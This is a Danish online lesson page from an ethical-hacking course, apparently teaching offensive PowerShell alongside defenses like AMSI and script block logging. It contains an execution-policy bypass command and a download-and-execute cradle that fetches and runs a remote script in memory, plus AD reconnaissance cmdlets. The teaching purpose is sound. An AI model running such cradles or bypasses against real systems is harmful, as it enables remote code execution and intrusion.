PowerShell for angribere
Offensiv PowerShell
PowerShell for angribere er en gratis Ethical Hacking Academy-lektion på CoddyKit. Dette er lektion 4 af 4. Du kan læse hele lektionen gratis nedenfor — og derefter øve dig praktisk i browseren med en indbygget kodeeditor og en AI-vejleder, der er tilgængelig døgnet rundt. Den er en del af læringsforløbet i Ethical Hacking Academy, og dine fremskridt synkroniseres på tværs af nettet og CoddyKit-appen. Ethical Hacking Academy-kurset indeholder 4 lektioner i alt.
Hvorfor PowerShell
PowerShell er indbygget i Windows, tæt integreret med operativsystemet og .NET og betroet af administratorer. Derfor er det et populært værktøj, der lever af systemets egne funktioner, for angribere – der skal ikke installeres malware.
Denne lektion gennemgår begreber inden for offensiv PowerShell, som du skal forstå for at kunne angribe og forsvare Windows.
Cmdlets og pipeline
PowerShell-kommandoer er cmdlets i formen udsagnsord-navneord. De sender indholdsrige objekter (ikke kun tekst) gennem pipelinen, hvilket gør kortlægning effektiv.
Get-Process | Where-Object { $_.CPU -gt 10 } | Select-Object Name, IdSystemkortlægning
Angribere bruger indbyggede cmdlets til hurtigt at undersøge en vært – brugere, tjenester, netværk og opdateringer.
Get-LocalUser
Get-Service | Where-Object Status -eq 'Running'
Get-NetTCPConnection -State ListenUdførelsespolitikken er ikke sikkerhed
Udførelsespolitikken begrænser kørsel af scriptfiler, men den er ikke en sikkerhedsgrænse. Mange simple flag omgår den, så forsvarere bør ikke stole på den.
powershell -ExecutionPolicy Bypass -File script.ps1Download og kør
En almindelig teknik henter en payload og kører den i hukommelsen, så der efterlades meget lidt på disken. Derfor er overvågning af netværk og AMSI vigtig.
IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/tool.ps1')Kodede kommandoer
Flaget -EncodedCommand kører Base64-kodet PowerShell og bruges ofte til at skjule hensigten for overfladisk inspektion og simple filtre.
Forsvarere afkoder disse fra logfiler for at afsløre, hvad der faktisk blev kørt.
powershell -EncodedCommand <base64-here>Offensive frameworks
Modne værktøjssamlinger bygger videre på disse grundfunktioner:
- PowerSploit / PowerView – AD-kortlægning og aktiviteter efter kompromittering.
- Empire / Covenant – kommando og kontrol.
- Nishang – offensive scripts.
De fleste genkendes nu af forsvarsværktøjer gennem omfattende signaturer.
Rekognoscering af Active Directory
I et domæne kortlægger PowerShell (PowerView eller AD-modulet) brugere, grupper og tillidsrelationer – grundlaget for at finde en vej til Domain Admin.
Get-ADUser -Filter * -Properties LastLogonDate
Get-ADGroupMember 'Domain Admins'AMSI og logning
Microsoft har tilføjet forsvar specifikt mod misbrug af PowerShell:
- AMSI (Antimalware Scan Interface) scanner scriptindhold før kørsel.
- Script Block Logging registrerer, hvad der køres.
- Constrained Language Mode begrænser farlige funktioner.
Angribere forsøger at omgå AMSI; forsvarere holder øje med logfilerne.
Defensiv jagt
Blue teams leder efter ondsindet PowerShell ved at se efter:
- Kodede eller obfuskerede kommandoer.
- Netværkshentninger med
DownloadString/IEX. - Usædvanlige overordnede processer (Office starter PowerShell).
- AMSI- og scriptbloklogge med hændelses-id 4104.
Brug det etisk
Disse teknikker er effektive og svarer direkte til virkelige indtrængninger. Kør dem kun i dit eget labmiljø eller med udtrykkelig skriftlig tilladelse.
Det er lige så værdifuldt at øve den defensive side – læse logfiler og opdage AMSI-træffere – som den offensive side.
Hurtigt tjek
Vurdér udførelsespolitikken som en kontrol.
Opsummering
Du har udforsket offensiv PowerShell:
- Objektbaserede cmdlets gør kortlægning effektiv og diskret (ved at bruge systemets egne funktioner).
- Download og kør, kodede kommandoer og frameworks som PowerView/Empire.
- Udførelsespolitikken er ikke sikkerhed; AMSI og scriptbloklogning er det egentlige forsvar.
- Arbejd altid etisk, og studér den defensive side.
Dette afslutter kurset i Windows Internals.
Lær Ethical Hacking Academy med en AI-underviser — gratis
Skriv og kør rigtig kode i din browser, få øjeblikkelig hjælp fra en AI-underviser døgnet rundt, og fortsæt, hvor du slap, på web eller i appen.
- Kurser
- 31
- Lektioner
- 111
Ofte stillede spørgsmål
Er lektionen “PowerShell for angribere” gratis?
Ja — hele teksten til “PowerShell for angribere” kan læses gratis her på nettet. Hvis du vil øve dig interaktivt med en indbygget kodeeditor og en AI-vejleder døgnet rundt og få adgang til resten af Ethical Hacking Academy-kurset, skal du opgradere til CoddyKit PRO. Ethical Hacking Academy-kurset indeholder 4 lektioner i alt.
Hvad lærer jeg i “PowerShell for angribere”?
Offensiv PowerShell Du øver dig i Ethical Hacking Academy med praktisk kode, som du kører direkte i browseren, og en AI-vejleder døgnet rundt besvarer dine spørgsmål, mens du arbejder dig gennem lektionen.
Skal jeg have erfaring for at begynde på Ethical Hacking Academy?
Der kræves ingen tidligere erfaring. Ethical Hacking Academy på CoddyKit er tilrettelagt for både begyndere og øvede, så du kan starte her eller fra begyndelsen og lære i dit eget tempo. Dette er lektion 4 af 4.
Hvor lang tid tager lektionen “PowerShell for angribere”?
De fleste CoddyKit-lektioner tager cirka 5–10 minutter. Hver lektion er kort og interaktiv, så du gør løbende fremskridt og kan fortsætte, hvor du slap – på både web og app.
Kan jeg skrive og køre kode i denne Ethical Hacking Academy-lektion?
Ja. Alle Ethical Hacking Academy-lektioner har en indbygget kodeeditor, så du kan skrive og køre rigtig kode direkte i din browser og få øjeblikkelig feedback fra AI – uden lokal opsætning.
Alle lektioner i dette kursus
- Windows-arkitektur
- Registreringsdatabasen
- Windows-godkendelse
- PowerShell for angribere